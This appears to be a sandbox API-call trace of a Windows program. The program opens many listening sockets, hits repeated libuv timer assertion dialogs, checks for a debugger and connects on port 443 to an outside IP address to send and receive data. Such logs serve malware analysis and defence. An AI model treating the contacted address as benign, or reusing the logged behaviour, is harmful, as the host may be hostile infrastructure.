	[0108.373] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9cc, lpOutputBuffer=0x51cb1a0, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cb180 | out: lpOutputBuffer=0x51cb1a0, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cb180) returned 0
	[0108.373] GetLastError () returned 0x3e5
	[0108.373] socket (af=2, type=1, protocol=0) returned 0x9d0
	[0108.373] SetHandleInformation (hObject=0x9d0, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.373] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9d0, lpOutputBuffer=0x51cb30c, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cb2ec | out: lpOutputBuffer=0x51cb30c, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cb2ec) returned 0
	[0108.373] GetLastError () returned 0x3e5
	[0108.373] socket (af=2, type=1, protocol=0) returned 0x9d4
	[0108.374] SetHandleInformation (hObject=0x9d4, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.374] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9d4, lpOutputBuffer=0x51cb478, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cb458 | out: lpOutputBuffer=0x51cb478, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cb458) returned 0
	[0108.374] GetLastError () returned 0x3e5
	[0108.374] socket (af=2, type=1, protocol=0) returned 0x9d8
	[0108.374] SetHandleInformation (hObject=0x9d8, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.374] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9d8, lpOutputBuffer=0x51cb5e4, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cb5c4 | out: lpOutputBuffer=0x51cb5e4, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cb5c4) returned 0
	[0108.374] GetLastError () returned 0x3e5
	[0108.374] socket (af=2, type=1, protocol=0) returned 0x9ec
	[0108.387] SetHandleInformation (hObject=0x9ec, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.387] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9ec, lpOutputBuffer=0x51cb750, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cb730 | out: lpOutputBuffer=0x51cb750, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cb730) returned 0
	[0108.387] GetLastError () returned 0x3e5
	[0108.387] socket (af=2, type=1, protocol=0) returned 0x9f0
	[0108.387] SetHandleInformation (hObject=0x9f0, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.387] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9f0, lpOutputBuffer=0x51cb8bc, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cb89c | out: lpOutputBuffer=0x51cb8bc, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cb89c) returned 0
	[0108.387] GetLastError () returned 0x3e5
	[0108.387] socket (af=2, type=1, protocol=0) returned 0x9f4
	[0108.388] SetHandleInformation (hObject=0x9f4, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.388] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9f4, lpOutputBuffer=0x51cba28, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cba08 | out: lpOutputBuffer=0x51cba28, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cba08) returned 0
	[0108.388] GetLastError () returned 0x3e5
	[0108.388] socket (af=2, type=1, protocol=0) returned 0x9f8
	[0108.388] SetHandleInformation (hObject=0x9f8, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.388] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9f8, lpOutputBuffer=0x51cbb94, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cbb74 | out: lpOutputBuffer=0x51cbb94, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cbb74) returned 0
	[0108.388] GetLastError () returned 0x3e5
	[0108.388] socket (af=2, type=1, protocol=0) returned 0x9fc
	[0108.389] SetHandleInformation (hObject=0x9fc, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.389] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0x9fc, lpOutputBuffer=0x51cbd00, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cbce0 | out: lpOutputBuffer=0x51cbd00, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cbce0) returned 0
	[0108.389] GetLastError () returned 0x3e5
	[0108.389] socket (af=2, type=1, protocol=0) returned 0xa00
	[0108.389] SetHandleInformation (hObject=0xa00, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.389] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0xa00, lpOutputBuffer=0x51cbe6c, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cbe4c | out: lpOutputBuffer=0x51cbe6c, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cbe4c) returned 0
	[0108.389] GetLastError () returned 0x3e5
	[0108.389] socket (af=2, type=1, protocol=0) returned 0xa04
	[0108.389] SetHandleInformation (hObject=0xa04, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.389] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0xa04, lpOutputBuffer=0x51cbfd8, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cbfb8 | out: lpOutputBuffer=0x51cbfd8, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cbfb8) returned 0
	[0108.389] GetLastError () returned 0x3e5
	[0108.389] socket (af=2, type=1, protocol=0) returned 0xa08
	[0108.389] SetHandleInformation (hObject=0xa08, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.390] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0xa08, lpOutputBuffer=0x51cc144, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cc124 | out: lpOutputBuffer=0x51cc144, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cc124) returned 0
	[0108.390] GetLastError () returned 0x3e5
	[0108.390] socket (af=2, type=1, protocol=0) returned 0xa0c
	[0108.390] SetHandleInformation (hObject=0xa0c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.390] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0xa0c, lpOutputBuffer=0x51cc2b0, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cc290 | out: lpOutputBuffer=0x51cc2b0, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cc290) returned 0
	[0108.390] GetLastError () returned 0x3e5
	[0108.390] socket (af=2, type=1, protocol=0) returned 0xa10
	[0108.390] SetHandleInformation (hObject=0xa10, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.390] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0xa10, lpOutputBuffer=0x51cc41c, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cc3fc | out: lpOutputBuffer=0x51cc41c, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cc3fc) returned 0
	[0108.390] GetLastError () returned 0x3e5
	[0108.390] socket (af=2, type=1, protocol=0) returned 0xa14
	[0108.390] SetHandleInformation (hObject=0xa14, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.390] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0xa14, lpOutputBuffer=0x51cc588, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cc568 | out: lpOutputBuffer=0x51cc588, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cc568) returned 0
	[0108.390] GetLastError () returned 0x3e5
	[0108.390] socket (af=2, type=1, protocol=0) returned 0xa18
	[0108.390] SetHandleInformation (hObject=0xa18, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.390] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0xa18, lpOutputBuffer=0x51cc6f4, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cc6d4 | out: lpOutputBuffer=0x51cc6f4, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cc6d4) returned 0
	[0108.391] GetLastError () returned 0x3e5
	[0108.391] socket (af=2, type=1, protocol=0) returned 0xa1c
	[0108.391] SetHandleInformation (hObject=0xa1c, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.391] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0xa1c, lpOutputBuffer=0x51cc860, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cc840 | out: lpOutputBuffer=0x51cc860, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cc840) returned 0
	[0108.391] GetLastError () returned 0x3e5
	[0108.391] socket (af=2, type=1, protocol=0) returned 0xa20
	[0108.391] SetHandleInformation (hObject=0xa20, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.392] AcceptEx (in: sListenSocket=0x990, sAcceptSocket=0xa20, lpOutputBuffer=0x51cc9cc, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51cc9ac | out: lpOutputBuffer=0x51cc9cc, lpdwBytesReceived=0x20af7c8*=0x51b2c88, lpOverlapped=0x51cc9ac) returned 0
	[0108.392] GetLastError () returned 0x3e5
	[0108.392] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x227, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0108.392] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819089900000) returned 1
	[0108.392] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819089900000) returned 1
	[0108.393] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0108.396] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0108.397] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0108.397] IsDebuggerPresent () returned 0
	[0108.397] GetProcessWindowStation () returned 0x84
	[0108.397] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0108.397] GetActiveWindow () returned 0x0
	[0108.398] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0108.744] SetLastError (dwErrCode=0x0) 
	[0108.744] SetLastError (dwErrCode=0x0) 
	[0108.744] FreeAddrInfoW (pAddrInfo=0x26ed050*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x51a72c0*(sa_family=2, sin_port=0x0, sin_addr="109.230.199.30"), ai_next=0x0)) 
	[0108.744] SetLastError (dwErrCode=0x0) 
	[0108.744] GetLastError () returned 0x0
	[0108.745] SetLastError (dwErrCode=0x0) 
	[0108.745] GetLastError () returned 0x0
	[0108.745] SetLastError (dwErrCode=0x0) 
	[0108.745] GetLastError () returned 0x0
	[0108.745] SetLastError (dwErrCode=0x0) 
	[0108.745] GetLastError () returned 0x0
	[0108.745] SetLastError (dwErrCode=0x0) 
	[0108.745] strncpy (in: _Dest=0x20afb48, _Source="109.230.199.30", _Count=0x41 | out: _Dest="109.230.199.30") returned="109.230.199.30"
	[0108.745] GetLastError () returned 0x0
	[0108.745] SetLastError (dwErrCode=0x0) 
	[0108.745] SetLastError (dwErrCode=0x0) 
	[0108.746] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0108.746] GetLastError () returned 0x102
	[0108.746] timeGetTime () returned 0x2eafd
	[0108.746] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af910 | out: lpSystemTimeAsFileTime=0x20af910*(dwLowDateTime=0x7266d82a, dwHighDateTime=0x1d492ec)) 
	[0108.747] htons (hostshort=0x1bb) returned 0xbb01
	[0108.747] socket (af=2, type=1, protocol=0) returned 0xa24
	[0108.747] ioctlsocket (in: s=0xa24, cmd=-2147195266, argp=0x20af718 | out: argp=0x20af718) returned 0
	[0108.747] SetHandleInformation (hObject=0xa24, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.747] CreateIoCompletionPort (FileHandle=0xa24, ExistingCompletionPort=0x398, CompletionKey=0xa24, NumberOfConcurrentThreads=0x0) returned 0x398
	[0108.748] SetFileCompletionNotificationModes (FileHandle=0xa24, Flags=0x3) returned 1
	[0108.748] bind (s=0xa24, addr=0x44ab1c0*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0
	[0108.776] WSAIoctl (in: s=0xa24, dwIoControlCode=0xc8000006, lpvInBuffer=0x20af738, cbInBuffer=0x10, lpvOutBuffer=0x51b3720, cbOutBuffer=0x4, lpcbBytesReturned=0x20af734, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x51b3720, lpcbBytesReturned=0x20af734, lpOverlapped=0x0) returned 0
	[0108.776] ConnectEx (in: s=0xa24, name=0x20af760*(sa_family=2, sin_port=0x1bb, sin_addr="109.230.199.30"), namelen=16, lpSendBuffer=0x0, dwSendDataLength=0x0, lpdwBytesSent=0x20af75c, lpOverlapped=0x51bad70 | out: lpSendBuffer=0x0, lpdwBytesSent=0x20af75c*=0x259d390) returned 0
	[0108.777] GetLastError () returned 0x3e5
	[0108.777] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0xa6, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0108.815] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819132200000) returned 1
	[0108.815] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819132200000) returned 1
	[0108.816] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0108.816] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0108.816] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0108.816] IsDebuggerPresent () returned 0
	[0108.817] GetProcessWindowStation () returned 0x84
	[0108.817] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0108.817] GetActiveWindow () returned 0x0
	[0108.817] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0109.147] setsockopt (s=0xa24, level=65535, optname=28688, optval=0x0, optlen=0) returned 0
	[0109.147] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f894, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\x2aec\x52\x3ac8\x52\x4bf8\x25b\x345d\x411\x4bd0\x25b\x2aec\x52\x3ac8\x52\x38ca\x3f8\xf958\x20a\x4bd0\x25b\xf8f0\x20a\x37d9\x3f8\xf968\x20a\x5220\x26d\x0a") returned 0x0
	[0109.147] GetLastError () returned 0xcb
	[0109.148] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f634, nSize=0x7fff | out: lpBuffer="䔰Гȉ\x0c") returned 0x0
	[0109.148] GetLastError () returned 0xcb
	[0109.149] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f634, nSize=0x7fff | out: lpBuffer="䔰Гȉ\x0c") returned 0x0
	[0109.149] GetLastError () returned 0xcb
	[0109.149] WSARecv (in: s=0xa24, lpBuffers=0x20af644, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20af640, lpFlags=0x20af63c*=0x0, lpOverlapped=0x51b36e4, lpCompletionRoutine=0x0 | out: lpBuffers=0x20af644*=((len=0x0, buf=0x44a7430)), lpNumberOfBytesRecvd=0x20af640*=0x20af698, lpFlags=0x20af63c*=0x0, lpOverlapped=0x51b36e4) returned -1
	[0109.149] GetLastError () returned 0x3e5
	[0109.149] SetLastError (dwErrCode=0x0) 
	[0109.149] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af32c | out: lpSystemTimeAsFileTime=0x20af32c*(dwLowDateTime=0x72a463e3, dwHighDateTime=0x1d492ec)) 
	[0109.150] SetLastError (dwErrCode=0x0) 
	[0109.150] WSASend (in: s=0xa24, lpBuffers=0x20af7a8*=((len=0x12e, buf=0x51b4970*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x20af710, dwFlags=0x0, lpOverlapped=0x51cf978, lpCompletionRoutine=0x0 | out: lpBuffers=0x20af7a8*=((len=0x12e, buf=0x51b4970*)), lpNumberOfBytesSent=0x20af710*=0x12e, lpOverlapped=0x51cf978) returned 0
	[0109.151] SetLastError (dwErrCode=0x0) 
	[0109.151] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ab66c | out: lpSystemTimeAsFileTime=0x20ab66c*(dwLowDateTime=0x72a487a9, dwHighDateTime=0x1d492ec)) 
	[0109.151] SetLastError (dwErrCode=0x0) 
	[0109.151] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0109.151] GetLastError () returned 0x102
	[0109.151] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819165800000) returned 1
	[0109.152] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0109.152] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0109.152] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0109.153] IsDebuggerPresent () returned 0
	[0109.153] GetProcessWindowStation () returned 0x84
	[0109.153] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0109.153] GetActiveWindow () returned 0x0
	[0109.153] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0109.399] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0109.526] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x3e8, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0109.526] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819203300000) returned 1
	[0109.526] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819203300000) returned 1
	[0109.527] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0109.532] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0109.532] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0109.532] IsDebuggerPresent () returned 0
	[0109.532] GetProcessWindowStation () returned 0x84
	[0109.532] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0109.532] GetActiveWindow () returned 0x0
	[0109.532] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0109.806] WSARecv (in: s=0xa24, lpBuffers=0x20afbf8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbf0, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbf8*=((len=0x1000, buf=0x26450b0*)), lpNumberOfBytesRecvd=0x20afbf0*=0x36b, lpFlags=0x20afbf4*=0x0, lpOverlapped=0x0) returned 0
	[0109.806] SetLastError (dwErrCode=0x0) 
	[0109.806] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20afaac | out: lpSystemTimeAsFileTime=0x20afaac*(dwLowDateTime=0x730877e8, dwHighDateTime=0x1d492ec)) 
	[0109.806] SetLastError (dwErrCode=0x0) 
	[0109.806] SetLastError (dwErrCode=0x0) 
	[0109.806] SetLastError (dwErrCode=0x0) 
	[0109.807] SetLastError (dwErrCode=0x0) 
	[0109.807] SetLastError (dwErrCode=0x0) 
	[0109.807] SetLastError (dwErrCode=0x0) 
	[0109.807] GetLastError () returned 0x0
	[0109.807] SetLastError (dwErrCode=0x0) 
	[0109.807] SetLastError (dwErrCode=0x0) 
	[0109.808] SetLastError (dwErrCode=0x0) 
	[0109.808] SetLastError (dwErrCode=0x0) 
	[0109.808] SetLastError (dwErrCode=0x0) 
	[0109.808] SetLastError (dwErrCode=0x0) 
	[0109.808] SetLastError (dwErrCode=0x0) 
	[0109.810] SetLastError (dwErrCode=0x0) 
	[0109.810] SetLastError (dwErrCode=0x0) 
	[0109.811] SetLastError (dwErrCode=0x0) 
	[0109.811] SetLastError (dwErrCode=0x0) 
	[0109.811] SetLastError (dwErrCode=0x0) 
	[0109.811] SetLastError (dwErrCode=0x0) 
	[0109.811] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af62c | out: lpSystemTimeAsFileTime=0x20af62c*(dwLowDateTime=0x73094f0d, dwHighDateTime=0x1d492ec)) 
	[0109.811] SetLastError (dwErrCode=0x0) 
	[0109.811] SetLastError (dwErrCode=0x0) 
	[0109.811] WSASend (in: s=0xa24, lpBuffers=0x20afb10*=((len=0xbf, buf=0x51b4970*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x20afa78, dwFlags=0x0, lpOverlapped=0x51cf978, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afb10*=((len=0xbf, buf=0x51b4970*)), lpNumberOfBytesSent=0x20afa78*=0xbf, lpOverlapped=0x51cf978) returned 0
	[0109.812] WSARecv (in: s=0xa24, lpBuffers=0x20afbd0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x20afbcc, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b36e4, lpCompletionRoutine=0x0 | out: lpBuffers=0x20afbd0*=((len=0x0, buf=0x44a7430)), lpNumberOfBytesRecvd=0x20afbcc*=0x0, lpFlags=0x20afbc8*=0x0, lpOverlapped=0x51b36e4) returned -1
	[0109.812] GetLastError () returned 0x3e5
	[0109.812] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0109.812] GetLastError () returned 0x102
	[0109.812] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819231900000) returned 1
	[0109.813] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
	[0109.813] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0109.813] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af264, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0109.813] IsDebuggerPresent () returned 0
	[0109.813] GetProcessWindowStation () returned 0x84
	[0109.813] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aeda4, nLength=0xc, lpnLengthNeeded=0x20aed90 | out: pvInfo=0x20aeda4, lpnLengthNeeded=0x20aed90) returned 1
	[0109.813] GetActiveWindow () returned 0x0
	[0109.813] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0110.118] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x2ca, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0110.118] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819262500000) returned 1
	[0110.118] QueryPerformanceCounter (in: lpPerformanceCount=0x20afc38 | out: lpPerformanceCount=0x20afc38*=1819262500000) returned 1
	[0110.119] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aedd8 | out: phModule=0x20aedd8*=0x77960000) returned 1
